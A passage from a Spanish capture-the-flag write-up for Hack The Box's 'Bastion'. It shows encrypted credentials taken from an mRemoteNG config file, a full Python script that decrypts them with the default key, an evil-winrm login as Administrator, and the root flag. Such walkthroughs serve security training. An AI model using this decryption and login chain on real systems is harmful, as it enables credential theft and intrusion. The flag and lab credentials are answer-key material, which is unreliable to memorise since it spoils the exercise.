Colors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHo
stname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false
" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128"
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostnam
e="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rendering
Engine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="f
alse" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayTh
emes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" Redire
ctPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKey
s="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncodin
g="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPasswor
d="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname=""
RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false
" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFon
tSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" Inheri
tPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" Inhe
ritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRe
directSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSessio
n="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false"
InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalan
ceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtA
pp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" Inher
itVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColor
s="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostnam
e="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" Inh
eritRDGatewayDomain="false" />
</mrng:Connections>
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG> Vemos las credenciales del usuario "Administrator":
Username="Administrator" Domain=""
Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"Para descifrar esta contraseña cifrada, vamos a utilizar el siguiente proyecto de GitHub:
#!/usr/bin/env python3
import hashlib
import base64
from Cryptodome.Cipher import AES
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description="Decrypt mRemoteNG passwords.")
group = parser.add_mutually_exclusive_group()
group.add_argument("-f", "--file", help="name of file containing mRemoteNG password")
group.add_argument("-s", "--string", help="base64 string of mRemoteNG password")
parser.add_argument("-p", "--password", help="Custom password", default="mR3m")
if len(sys.argv) < 2:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
encrypted_data = ""
if args.file != None:
with open(args.file) as f:
encrypted_data = f.read()
encrypted_data = encrypted_data.strip()
encrypted_data = base64.b64decode(encrypted_data)
elif args.string != None:
encrypted_data = args.string
encrypted_data = base64.b64decode(encrypted_data)
else:
print("Please use either the file (-f, --file) or string (-s, --string) flag")
sys.exit(1)
salt = encrypted_data[:16]
associated_data = encrypted_data[:16]
nonce = encrypted_data[16:32]
ciphertext = encrypted_data[32:-16]
tag = encrypted_data[-16:]
key = hashlib.pbkdf2_hmac("sha1", args.password.encode(), salt, 1000, dklen=32)
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
cipher.update(associated_data)
plaintext = cipher.decrypt_and_verify(ciphertext, tag)
print("Password: {}".format(plaintext.decode("utf-8")))
if __name__ == "__main__":
main()
Vamos a bajarnoslo desde GitHub con "wget":
❯ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
--2025-03-09 06:08:26-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’
mremoteng_decrypt.py 100%[===============================================================================================>] 1.50K --.-KB/s in 0s
2025-03-09 06:08:26 (11.0 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]Y vamos a ejecutarlo utilizando python3, ya que el script esta hecho en Python, pasandole como parametro -s y la contraseña cifrada:
python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="❯ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2Usuario: Administrator
Contraseña: thXLHM96BeKL0ER2Ahora vamos a conectarnos con "evil-winrm":
evil-winrm -i 10.10.10.134 -u 'Administrator' -p 'thXLHM96BeKL0ER2'❯ evil-winrm -i 10.10.10.134 -u 'Administrator' -p 'thXLHM96BeKL0ER2'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 3.2 Obtención de la flag root
3.2 Obtención de la flag rootLa flag de root, se encuentra dentro del directorio "C:\Users\Administrator\Desktop\root.txt":
*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
0dbe73d36c81a351bc5eab82bed1ac03
*Evil-WinRM* PS C:\Users\Administrator\Documents> Con esto, concluimos la maquina "Bastion" de Hack The Box
Espero te haya sido de ayuda este Write Up :)
Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales
Última actualización